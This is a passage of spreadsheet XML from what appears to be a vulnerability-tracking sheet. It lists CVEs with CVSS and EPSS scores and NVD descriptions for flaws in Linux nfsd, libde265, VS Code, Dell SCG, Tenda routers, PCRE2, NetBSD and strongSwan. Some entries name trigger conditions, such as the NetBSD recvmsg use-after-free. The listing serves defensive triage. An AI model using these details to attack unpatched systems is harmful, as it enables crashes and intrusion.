Because the nfsd_file cache reuses a single struct file
across requests targeting the same inode, a concurrent
COMMIT or stable WRITE on dst advances dst-&gt;f_wb_err to the
current mapping-&gt;wb_err via file_check_and_advance_wb_err()
during its own vfs_fsync_range(). If that advancement lands
between the writeback error appearing in mapping-&gt;wb_err
and the COPY worker sampling "since", the worker captures
the already-advanced cursor, errseq_check() sees cur ==
since and returns zero, and NFSD4_COPY_F_COMMITTED is set
even though writeback failed. CB_OFFLOAD then encodes
wr_stable_how = FILE_SYNC4, the client treats the copied
data as durable, and the failure becomes silent data loss.
Sample since once at the start of the function. The cursor
then reflects state in effect before this COPY issues any
writes, and filemap_check_wb_err() detects any error that
occurs during the copy regardless of which thread first
observes it. This matches the pattern used by
nfsd_vfs_write() and nfsd4_clone_file_range().</t>
        </is>
      </c>
      <c r="S514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89704</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89706</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr"/>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: Reset write verifier when async COPY writeback fails
Async COPY captures nn-&gt;writeverf at request time and reports it to
the client via CB_OFFLOAD after the worker kthread completes. When
the post-copy vfs_fsync_range() or filemap_check_wb_err() in
_nfsd_copy_file_range() reports an error, the worker correctly
leaves NFSD4_COPY_F_COMMITTED clear so that CB_OFFLOAD encodes
wr_stable_how as NFS_UNSTABLE, but the server's write verifier is
not rotated.
A client that receives NFS_UNSTABLE in CB_OFFLOAD follows up with
COMMIT to make the copied data durable. With the verifier
unchanged, COMMIT returns the same value the client just received
via CB_OFFLOAD, and the client concludes the copy is durable --
silently dropping the data whose writeback in fact failed. This
violates the UNSTABLE+COMMIT durability contract (RFC 7862 section
15.1, RFC 8881 section 18.32) and matches the bug just fixed in
nfsd_vfs_write() and nfsd_commit().
Rotate nn-&gt;writeverf at the writeback-failure site. The async COPY
worker has no svc_rqst, so commit_reset_write_verifier() is not
available here; calling nfsd_reset_write_verifier() directly
mirrors the trace-less reset already used by
nfsd_file_check_write_error() for the same purpose. Filter out
-EAGAIN and -ESTALE, matching commit_reset_write_verifier(), since
neither indicates a durable-storage failure.</t>
        </is>
      </c>
      <c r="S515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89706</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89707</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr"/>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: release path refs on follow_down() error
nfsd_cross_mnt() initializes a local struct path with mntget() and
dget() before calling follow_down(). On a negative return the error
arm jumps to out without releasing those references:
    err = follow_down(&amp;path, follow_flags);
    if (err &lt; 0)
            goto out;
follow_down() never drops the caller's entry-time refs on any error
sub-case; for example a pre-cross d_manage() failure leaves path
untouched, so the mntget()/dget() taken on entry survive the call.
Every other early-exit arm in nfsd_cross_mnt() (other-namespace
return, IS_ERR(exp2), and the success tail after the swap) already
calls path_put(&amp;path); the err &lt; 0 arm is the lone omission. The
leak inflates mnt_count and d_count on each failed cross-mount,
blocking umount and pinning dentries against the shrinker, and is
reachable by any authenticated NFS client through nfsd_lookup_dentry
or the NFSv4 READDIR encode path.
Fix by calling path_put(&amp;path) before the goto out in the err &lt; 0
arm so the entry-time refs are released on all follow_down() error
returns.</t>
        </is>
      </c>
      <c r="S516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89707</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54240</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr"/>
      <c r="Q517" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>libde265 is an open source implementation of the h.265 video codec. Versions prior to 1.1.1 use signed 32-bit arithmetic to calculate pixel offsets, allowing a crafted HEVC stream with large image dimensions to trigger an integer overflow and cause out-of-bounds heap reads or writes, potentially disclosing data, corrupting memory, or crashing the decoder. Version 1.1.1 contains a patch.</t>
        </is>
      </c>
      <c r="S517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54240</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54241</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr"/>
      <c r="Q518" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>libde265 is an open source implementation of the h.265 video codec. Versions prior to 1.1.1 use signed 32-bit arithmetic to calculate the sample adaptive offset input-buffer size, allowing a crafted HEVC stream with large dimensions and 16-bit luma samples to cause an integer overflow, an undersized allocation, and an out-of-bounds heap read that may expose heap data in decoded output or crash the decoder. Version 1.1.1 contains a patch.</t>
        </is>
      </c>
      <c r="S518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54241</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78461</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr"/>
      <c r="Q519" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78492</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr"/>
      <c r="Q520" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R52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20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78492</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78494</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr"/>
      <c r="Q521" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R521"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21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78494</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79644</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr"/>
      <c r="Q522" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R522"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22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79644</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79963</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr"/>
      <c r="Q523" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R523" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Download of Code Without Integrity Check vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to command execution.</t>
        </is>
      </c>
      <c r="S523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79963</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86166</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr"/>
      <c r="Q524" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Tenda HG10 300001138. This issue affects the function formWanRedirect of the file /boaform/formWanRedirect of the component Boa Web Server. Executing a manipulation of the argument if can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="S524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86166</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89157</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr"/>
      <c r="Q525" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48, on 32-bit platforms, has a pcre2_pattern_convert out-of-bounds write when an attacker can provide a large pattern.</t>
        </is>
      </c>
      <c r="S525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89157</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89769</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr"/>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clocksource/drivers/nxp-pit: Fix IRQ leak on cpuhp_setup_state error path
When cpuhp_setup_state fails after pit_clockevent_per_cpu_init has
successfully called request_irq, the error handling jumps directly to
out_pit_clocksource_unregister without freeing the registered IRQ.
This leaks the IRQ line and, since kfree(pit) follows, leaves a
dangling pointer registered as the interrupt handler's dev_id,
potentially leading to a use-after-free if the IRQ fires afterwards.
Fix it by calling pit_clockevent_per_cpu_exit to properly release the
IRQ before falling through to the existing cleanup chain.</t>
        </is>
      </c>
      <c r="S526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89769</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15679</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>5bcc34ac-0282-4e8a-96fc-046c583d3048</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr"/>
      <c r="Q527" s="5" t="inlineStr">
        <is>
          <t>CWE-258</t>
        </is>
      </c>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>Under certain circumstances such as reset to factory default operation, the BMC root account is made active without a password on BullSequana XH3406 and XH3515.</t>
        </is>
      </c>
      <c r="S527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15679</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57842</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr"/>
      <c r="Q528" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>NetBSD contains a use-after-free and double-free vulnerability in msg_recv_copyin() within the COMPAT_NETBSD32 compatibility layer due to a missing return statement before the cleanup label on the success path. Any local user able to execute a 32-bit binary on a 64-bit NetBSD system can trigger a kernel panic or memory corruption by calling recvmsg() with msg_iovlen between 9 and IOV_MAX, causing the kernel to access a freed iovec buffer and subsequently free the same allocation a second time.</t>
        </is>
      </c>
      <c r="S528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57842</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78135</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr"/>
      <c r="Q529" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 5.9.7 through 6.0.7 mishandles behavioral workflow in the IKEv2 state machine. Because CREATE_CHILD_SA requests are mishandled, there can be an authentication bypass.</t>
        </is>
      </c>
      <c r="S529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78135</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84652</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K530" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr"/>
      <c r="Q530" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="R530" s="5" t="inlineStr">
        <is>
